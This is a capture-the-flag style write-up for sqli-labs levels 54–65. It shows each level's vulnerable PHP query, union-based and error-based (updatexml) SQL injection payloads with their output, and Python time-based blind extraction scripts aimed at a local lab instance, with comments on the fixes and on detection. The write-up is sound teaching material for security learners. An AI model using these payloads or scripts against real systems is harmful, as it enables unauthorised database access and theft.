
Sqli-lab Challenges Write up

Sqli-lab Less54-65 writeup

Basic

show databases;         //查看数据库

use xxx;                //使用某个数据库

show tables;            //查看该数据库的数据表

desc xxx;               //查看该数据表的结构

select * from xxx;      //查找某个数据表的所有内容

select schema_name from information_schema.schemata;        //猜数据库

select table_name from information_schema.tables where table_schema='xxx';//猜某数据库的数据表

Select column_name from information_schema.columns where table_name='xxx';//猜某表的所有列

left(a,b);       //从左侧截取 a 的前 b 

mid(column_name,start[,length]);     //从位置start开始,截取column_name字符串的length位,与substr作用相同

substr(string, start, length);       //从位置start开始,截取字符串string的length长度,与mid作用相同

ascii();         //将某个字符转换成ascii码

ord();           //将某个字符转换成ascii码,同ascii()

Challenges

Less-54

// Lab query (Less-54): the id value is concatenated into the SQL string inside
// single quotes with no escaping or parameter binding, so the WHERE clause is
// under the caller's control. Binding id as a query parameter (or casting it
// to int before use) would remove the injection.
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";

没什么过滤,直接上

0' union select 1,group_concat(schema_name),2 from information_schema.schemata;%23

得到

Your Login name:information_schema,challenges,mysql,performance_schema,security
Your Password:2 

爆破表

0' union select 1,group_concat(table_name),2 from information_schema.tables where table_schema='challenges';%23

得到

Your Login name:QGVTNCJQK6
Your Password:2 

爆破列

0' union select 1,group_concat(column_name),2 from information_schema.columns where table_name='QGVTNCJQK6';%23

得到

Your Login name:id,sessid,secret_9YQQ,tryy
Your Password:2 

爆破内容

0' union select id,secret_9YQQ,tryy from QGVTNCJQK6;%23

得到

Your Login name:UEGTp3YhAO1wSaVNixYIWwMl
Your Password:3

Less-55

// Lab query (Less-55): the same unescaped concatenation, this time inside
// parentheses and without quotes (a numeric context). Parameter binding or an
// int cast is the fix here as well.
$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";

也是没什么过滤,直接上

0) union select 1,group_concat(schema_name),2 from information_schema.schemata;%23
Your Login name:information_schema,challenges,mysql,performance_schema,security

0) union select 1,group_concat(table_name),2 from information_schema.tables where table_schema='challenges';%23
Your Login name:HSTKPKBJZX

0) union select 1,group_concat(column_name),2 from information_schema.columns where table_name='HSTKPKBJZX';%23
Your Login name:id,sessid,secret_Y1KS,tryy

0) union select id,secret_Y1KS,tryy from HSTKPKBJZX;%23
Your Login name:BsZ12SElz8qNeK2rvFOTYpkb

Less-56

// Lab query (Less-56): unescaped concatenation inside ('...'). The surrounding
// quotes and parentheses are formatting, not validation.
$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";
0') union select 1,group_concat(table_name),2 from information_schema.tables where table_schema='challenges';%23
Your Login name:70ULR981EI

0') union select 1,group_concat(column_name),2 from information_schema.columns where table_name='70ULR981EI';%23
Your Login name:id,sessid,secret_KPCG,tryy

0') union select id,secret_KPCG,tryy from 70ULR981EI;%23
Your Login name:t8Q1iKTajlerR65fY1P8Lu8I

Less-57

// Lab code (Less-57): the value is wrapped in double quotes before use.
// Wrapping is formatting, not validation — the value still reaches the SQL
// string unescaped, so it should be bound as a parameter (or cast to int)
// instead.
$id= '"'.$id.'"';
// Query DB to get the correct output
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";

增加了"

0" union select 1,group_concat(table_name),2 from information_schema.tables where table_schema='challenges';%23
Your Login name:28YHZGI481

0" union select 1,group_concat(column_name),2 from information_schema.columns where table_name='28YHZGI481';%23
Your Login name:id,sessid,secret_152D,tryy

0" union select id,secret_152D,tryy from 28YHZGI481;%23
Your Login name:u1TfmRa1qunL2c4bGqZv4H6J

Less-58

// Lab code (Less-58). $id (presumably the request's id parameter — it is set
// outside this excerpt) is concatenated into the statement unescaped; a
// parameter binding or an int cast would close the injection.
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
    echo '<font color= "#00FFFF">';	
    // The returned row's id only indexes two fixed arrays, so the data the
    // query actually selected is never written to the page.
    $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
    $pass = array_reverse($unames);
    echo 'Your Login name : '. $unames[$row['id']];
    echo "<br>";
    echo 'Your Password : ' .$pass[$row['id']];
    echo "</font>";
}
else 
{
    echo '<font color= "#FFFF00">';
    // The raw database error text is sent to the client. That is an
    // information leak in its own right and is the channel the error-based
    // payloads in this write-up rely on; log it server-side and show a
    // generic message instead.
    print_r(mysql_error());
    echo "</font>";  
}

可以看到,查询结果被用作数组序号,输出被改了,但是mysql_error()被打印了,所以我们可以直接用报错注入

0' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1);%23
XPATH syntax error: '~HG2RC34XP0~'

0' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='HG2RC34XP0'),0x7e),1);%23
XPATH syntax error: '~id,sessid,secret_7IXP,tryy~'

0' and updatexml(1,concat(0x7e,(select secret_7IXP from HG2RC34XP0),0x7e),1);%23
XPATH syntax error: '~m20SLP9m0za56xuhE7s1awqR~'

Less-59

// Query DB to get the correct output
// Lab code (Less-59): as in Less-58, but $id is interpolated with no quotes
// at all (numeric context). The fix is unchanged — bind the value as a
// parameter or cast it to int before building the statement.
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
    echo '<font color= "#00FFFF">';	
    // The row's id only indexes two fixed arrays; selected data is never
    // echoed.
    $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
    $pass = array_reverse($unames);
    echo 'Your Login name : '. $unames[$row['id']];
    echo "<br>";
    echo 'Your Password : ' .$pass[$row['id']];
    echo "</font>";
}
else 
{
    echo '<font color= "#FFFF00">';
    // Raw database error text returned to the client — the leak the
    // error-based payloads below depend on. Log it, do not display it.
    print_r(mysql_error());
    echo "</font>";  
}

还是按照之前的用报错注入

0 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1);%23
XPATH syntax error: '~EANMX28TXI~'

0 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='EANMX28TXI'),0x7e),1);%23
XPATH syntax error: '~id,sessid,secret_Z6IM,tryy~'

0 and updatexml(1,concat(0x7e,(select secret_Z6IM from EANMX28TXI),0x7e),1);%23
XPATH syntax error: '~tEwpAjainXQeyDLGeSG1nuok~'

Less-60

// Lab code (Less-60): the value is wrapped in ("...") before use. Wrapping is
// formatting, not validation; the value still reaches the SQL string
// unescaped, so parameter binding (or an int cast) is still the fix.
$id = '("'.$id.'")';
// Query DB to get the correct output
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
    echo '<font color= "#00FFFF">';	
    // The row's id only indexes two fixed arrays; selected data is never
    // echoed.
    $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
    $pass = array_reverse($unames);
    echo 'Your Login name : '. $unames[$row['id']];
    echo "<br>";
    echo 'Your Password : ' .$pass[$row['id']];
    echo "</font>";
}
else 
{
    echo '<font color= "#FFFF00">';
    // Raw database error text returned to the client — the leak the
    // error-based payloads below depend on. Log it, do not display it.
    print_r(mysql_error());
    echo "</font>";  
}

直接加上")绕过,依然可以用报错注入

0") and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1);%23
XPATH syntax error: '~5OJBK8U9XQ~'

0") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='5OJBK8U9XQ'),0x7e),1);%23
XPATH syntax error: '~id,sessid,secret_8GHX,tryy~'

0") and updatexml(1,concat(0x7e,(select secret_8GHX from 5OJBK8U9XQ),0x7e),1);%23
XPATH syntax error: '~Ij8p6anZKPghpsC4S5Ti9mgi~'

Less-61

// Query DB to get the correct output
// Lab code (Less-61): unescaped concatenation inside (('...')). Extra quoting
// and bracketing do not change the underlying problem; bind the value.
$sql="SELECT * FROM security.users WHERE id=(('$id')) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
    echo '<font color= "#00FFFF">';	
    // The row's id only indexes two fixed arrays; selected data is never
    // echoed.
    $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
    $pass = array_reverse($unames);
    echo 'Your Login name : '. $unames[$row['id']];
    echo "<br>";
    echo 'Your Password : ' .$pass[$row['id']];
    echo "</font>";
}
else 
{
    echo '<font color= "#FFFF00">';
    // Raw database error text returned to the client — the leak the
    // error-based payloads below depend on. Log it, do not display it.
    print_r(mysql_error());
    echo "</font>";  
}

直接加上'))绕过,依然可以用报错注入

0')) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1);%23
XPATH syntax error: '~MP94IBBMTL~'

0')) and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='MP94IBBMTL'),0x7e),1);%23
XPATH syntax error: '~id,sessid,secret_QN8H,tryy~'

0')) and updatexml(1,concat(0x7e,(select secret_QN8H from MP94IBBMTL),0x7e),1);%23
XPATH syntax error: '~CieVXfic1dl9FuqHdChc2we3~' 

Less-62

// Query DB to get the correct output
// Lab code (Less-62): the statement is still built by concatenating $id
// unescaped into ('...'); only the output side differs from Less-56.
$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
    echo '<font color= "#00FFFF">';	
    // The row's id only indexes two fixed arrays; selected data is never
    // echoed.
    $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
    $pass = array_reverse($unames);
    echo 'Your Login name : '. $unames[$row['id']];
    echo "<br>";
    echo 'Your Password : ' .$pass[$row['id']];
    echo "</font>";
}
else 
{
    echo '<font color= "#FFFF00">';
    // mysql_error() is no longer echoed (compare Less-58..61). That closes
    // the error channel but not the injection: the query is still built by
    // concatenation, and response time (the sleep() the script below relies
    // on) stays observable. Fix the query construction, not just the output.
    //				print_r(mysql_error());
    echo "</font>";  
}

因为注释了print_r(mysql_error()),无法用报错注入。因为还有尝试次数,只能用延时注入

写了一下 jio 本,写的比较渣

# encoding: utf-8
# Less-62 helper script from the write-up: a time-based blind extraction loop
# run against the author's local lab instance. The page notes that error
# output is disabled at this level, so the only oracle left is response time:
# the injected if(...,sleep(5),0) delays the reply when a character guess is
# right, and the 4.5 s client timeout below turns that delay into a "hit".
# From the defender's side this traffic is very noisy — up to 62 requests per
# character position, each carrying sleep()/substr()/information_schema in the
# id parameter and each slow one taking ~5 s — which makes it an easy target
# for web-server and database log monitoring.
import requests
import re  # imported but never used in this script

index_url = "http://localhost:8081/Less-62/index.php?id="

# Browser-like headers sent with every request.
header = {
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36',
}
# Session cookies captured from the author's own lab session; the values are
# instance-specific and meaningless elsewhere.
cookie = {
    'challenge':'7b4184899f8b788841fb3eaf29177fdc',
    'PHPSESSID':'a64htnnoo54e99q0005mareng7'
}

# Characters recovered so far, appended one per position.
flag = ''


# Earlier stages (table name, then column name) left commented out by the
# author; the final stage below hard-codes the names they produced.
# for i in range(1,11):
#     print(i)
#     for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890':
#         j = ord(j)
#         # payload = "0') or if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
#         url = index_url + payload
#         try:
#             r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
#             # print(r.text)
#         except:
#             flag += chr(j)
#             print(flag)
#             break

# flag = 'secret_'
# for i in range(8,12):
#     print(i)
#     for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890':
#         j = ord(j)
#         payload = "0') or if((ascii(substr((select column_name from information_schema.columns where table_name='WMBY8Y9EUL' limit 2,1),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
#         url = index_url + payload
#         try:
#             r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
#             # print(r.text)
#         except:
#             flag += chr(j)
#             print(flag)
#             break
#secret_WPTM

# Final stage: positions 1..24 of the secret column, trying upper-case,
# digits and lower-case for each position.
for i in range(1,25):
    print(i)
    for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890qwertyuiopasdfghjklzxcvbnm':
        j = ord(j)  # compared as an ASCII code, matching ascii(substr(...)) in the payload
        payload = "0') or if((ascii(substr((select secret_WPTM from WMBY8Y9EUL),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
        url = index_url + payload
        try:
            # A correct guess makes the server sleep 5 s, which exceeds the
            # 4.5 s timeout and raises; a wrong guess returns promptly.
            r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
            # print(r.text)
        except:
            # Bare except: any failure, not only the timeout, is taken as a
            # hit, so a transient connection error yields a wrong character.
            flag += chr(j)
            print(flag)
            break
#mtvo4Z0u4wqd0nLRwxnydled

Less-63

// Lab code (Less-63): $id is concatenated into the statement unescaped inside
// single quotes; bind it as a parameter (or cast to int) instead.
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
    echo '<font color= "#00FFFF">';	
    // The row's id only indexes two fixed arrays; selected data is never
    // echoed.
    $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
    $pass = array_reverse($unames);
    echo 'Your Login name : '. $unames[$row['id']];
    echo "<br>";
    echo 'Your Password : ' .$pass[$row['id']];
    echo "</font>";
}
else 
{
    echo '<font color= "#FFFF00">';
    // mysql_error() is not echoed, so the error channel is closed, but the
    // injection itself remains and response time (sleep() in the script
    // below) is still observable. Fix the query construction, not the output.
    //				print_r(mysql_error());
    echo "</font>";  
}
# encoding: utf-8
# Less-63 helper script from the write-up: the same time-based blind loop as
# Less-62, now in three stages (table name, column name, secret value) with
# each stage feeding the next. The oracle is the 5 s sleep() on a correct
# guess versus the 4.5 s client timeout. For a defender the pattern is loud:
# dozens of requests per character, all containing sleep()/substr() in the id
# parameter, and every positive one taking ~5 s to answer.
import requests
import re  # imported but never used in this script

index_url = "http://localhost:8081/Less-63/index.php?id="

# Browser-like headers sent with every request.
header = {
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36',
}
# Session cookies captured from the author's own lab session; the values are
# instance-specific and meaningless elsewhere.
cookie = {
    'challenge':'31a6b5568bbb9c350c1b296d9086acf0',
    'PHPSESSID':'a64htnnoo54e99q0005mareng7'
}

flag = ''    # characters recovered in the current stage
table = ''   # result of stage 1
column = ''  # result of stage 2

# Stage 1: the table name, 10 positions, upper-case letters and digits only.
for i in range(1,11):
    print(i)
    for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890':
        j = ord(j)  # compared as an ASCII code, matching ascii(substr(...))
        payload = "0' or if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
        url = index_url + payload
        try:
            # Correct guess -> server sleeps 5 s -> timeout raises.
            r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
        except:
            # Bare except: any failure, not only the timeout, counts as a hit.
            flag += chr(j)
            print(flag)
            break

table = flag
print("#################################    table is %s" % table)
# Stage 2: `limit 2,1` selects the third column of that table. The author
# assumes it is named secret_XXXX (as in the earlier levels) and therefore
# seeds the prefix and probes only positions 8..11.
flag = 'secret_'
for i in range(8,12):
    print(i)
    for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890':
        j = ord(j)
        payload = "0' or if((ascii(substr((select column_name from information_schema.columns where table_name='"+ table +"' limit 2,1),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
        url = index_url + payload
        try:
            r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
            # print(r.text)
        except:
            flag += chr(j)
            print(flag)
            break

column = flag
print("#################################    column is %s" % column)
flag = ''

# Stage 3: the secret value, 24 positions, upper-case, digits and lower-case.
for i in range(1,25):
    print(i)
    for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890qwertyuiopasdfghjklzxcvbnm':
        j = ord(j)
        payload = "0' or if((ascii(substr((select "+ column +" from "+ table +"),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
        url = index_url + payload
        try:
            r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
            # print(r.text)
        except:
            flag += chr(j)
            print(flag)
            break
print("#################################    key is %s" % flag)

Less-64

// Query DB to get the correct output
// Lab code (Less-64): $id is concatenated unescaped inside (( )) with no
// quotes (numeric context); bind it as a parameter or cast to int.
$sql="SELECT * FROM security.users WHERE id=(($id)) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
    echo '<font color= "#00FFFF">';	
    // The row's id only indexes two fixed arrays; selected data is never
    // echoed.
    $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
    $pass = array_reverse($unames);
    echo 'Your Login name : '. $unames[$row['id']];
    echo "<br>";
    echo 'Your Password : ' .$pass[$row['id']];
    echo "</font>";
}
else 
{
    echo '<font color= "#FFFF00">';
    // mysql_error() is not echoed, so the error channel is closed, but the
    // injection itself remains and response time (sleep() in the script
    // below) is still observable. Fix the query construction, not the output.
    //				print_r(mysql_error());
    echo "</font>";  
}
# encoding: utf-8
# Less-64 helper script from the write-up: identical in structure to the
# Less-63 script (three stages: table name, column name, secret value), only
# the injection prefix differs to match this level's (( )) wrapping. The
# oracle is again the 5 s sleep() versus the 4.5 s client timeout; the
# resulting request pattern (dozens of ~5 s requests per character carrying
# sleep()/substr() in the id parameter) is easy to detect in server logs.
import requests
import re  # imported but never used in this script

index_url = "http://localhost:8081/Less-64/index.php?id="

# Browser-like headers sent with every request.
header = {
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36',
}
# Session cookies captured from the author's own lab session; the values are
# instance-specific and meaningless elsewhere.
cookie = {
    'challenge':'6efa4aae76d29c330a3636356fa5386c',
    'PHPSESSID':'a64htnnoo54e99q0005mareng7'
}

flag = ''    # characters recovered in the current stage
table = ''   # result of stage 1
column = ''  # result of stage 2

# Stage 1: the table name, 10 positions, upper-case letters and digits only.
for i in range(1,11):
    print(i)
    for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890':
        j = ord(j)  # compared as an ASCII code, matching ascii(substr(...))
        payload = "0)) or if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
        url = index_url + payload
        try:
            # Correct guess -> server sleeps 5 s -> timeout raises.
            r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
        except:
            # Bare except: any failure, not only the timeout, counts as a hit.
            flag += chr(j)
            print(flag)
            break

table = flag
print("#################################    table is %s" % table)
# Stage 2: `limit 2,1` selects the third column of that table. The author
# assumes it is named secret_XXXX (as in the earlier levels) and therefore
# seeds the prefix and probes only positions 8..11.
flag = 'secret_'
for i in range(8,12):
    print(i)
    for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890':
        j = ord(j)
        payload = "0)) or if((ascii(substr((select column_name from information_schema.columns where table_name='"+ table +"' limit 2,1),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
        url = index_url + payload
        try:
            r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
            # print(r.text)
        except:
            flag += chr(j)
            print(flag)
            break

column = flag
print("#################################    column is %s" % column)
flag = ''

# Stage 3: the secret value, 24 positions, upper-case, digits and lower-case.
for i in range(1,25):
    print(i)
    for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890qwertyuiopasdfghjklzxcvbnm':
        j = ord(j)
        payload = "0)) or if((ascii(substr((select "+ column +" from "+ table +"),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
        url = index_url + payload
        try:
            r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
            # print(r.text)
        except:
            flag += chr(j)
            print(flag)
            break
print("#################################    key is %s" % flag)

Less-65

// Lab code (Less-65): the value is wrapped in double quotes and then placed
// inside parentheses. Wrapping is formatting, not validation — the value still
// reaches the SQL string unescaped, so bind it as a parameter (or cast to int).
$id = '"'.$id.'"';
// Query DB to get the correct output
$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
    echo '<font color= "#00FFFF">';	
    // The row's id only indexes two fixed arrays; selected data is never
    // echoed.
    $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
    $pass = array_reverse($unames);
    echo 'Your Login name : '. $unames[$row['id']];
    echo "<br>";
    echo 'Your Password : ' .$pass[$row['id']];
    echo "</font>";
}
else 
{
    echo '<font color= "#FFFF00">';
    // mysql_error() is not echoed, so the error channel is closed, but the
    // injection itself remains and response time (sleep() in the script
    // below) is still observable. Fix the query construction, not the output.
    //				print_r(mysql_error());
    echo "</font>";  
}
# encoding: utf-8
# Less-65 helper script from the write-up: the same three-stage time-based
# blind loop as the Less-63/64 scripts, with the injection prefix adjusted to
# this level's ("...") wrapping (note the escaped double quote in each
# payload). The oracle is the 5 s sleep() versus the 4.5 s client timeout;
# the request pattern (dozens of ~5 s requests per character carrying
# sleep()/substr() in the id parameter) is easy to detect in server logs.
import requests
import re  # imported but never used in this script

index_url = "http://localhost:8081/Less-65/index.php?id="

# Browser-like headers sent with every request.
header = {
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36',
}
# Session cookies captured from the author's own lab session; the values are
# instance-specific and meaningless elsewhere.
cookie = {
    'challenge':'caf415945acc41218462264d7e211f37',
    'PHPSESSID':'a64htnnoo54e99q0005mareng7'
}

flag = ''    # characters recovered in the current stage
table = ''   # result of stage 1
column = ''  # result of stage 2

# Stage 1: the table name, 10 positions, upper-case letters and digits only.
for i in range(1,11):
    print(i)
    for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890':
        j = ord(j)  # compared as an ASCII code, matching ascii(substr(...))
        payload = "0\") or if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
        url = index_url + payload
        try:
            # Correct guess -> server sleeps 5 s -> timeout raises.
            r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
        except:
            # Bare except: any failure, not only the timeout, counts as a hit.
            flag += chr(j)
            print(flag)
            break

table = flag
print("#################################    table is %s" % table)
# Stage 2: `limit 2,1` selects the third column of that table. The author
# assumes it is named secret_XXXX (as in the earlier levels) and therefore
# seeds the prefix and probes only positions 8..11.
flag = 'secret_'
for i in range(8,12):
    print(i)
    for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890':
        j = ord(j)
        payload = "0\") or if((ascii(substr((select column_name from information_schema.columns where table_name='"+ table +"' limit 2,1),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
        url = index_url + payload
        try:
            r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
            # print(r.text)
        except:
            flag += chr(j)
            print(flag)
            break

column = flag
print("#################################    column is %s" % column)
flag = ''

# Stage 3: the secret value, 24 positions, upper-case, digits and lower-case.
for i in range(1,25):
    print(i)
    for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890qwertyuiopasdfghjklzxcvbnm':
        j = ord(j)
        payload = "0\") or if((ascii(substr((select "+ column +" from "+ table +"),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
        url = index_url + payload
        try:
            r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
            # print(r.text)
        except:
            flag += chr(j)
            print(flag)
            break
print("#################################    key is %s" % flag)
Licensed under CC BY-NC-SA 4.0
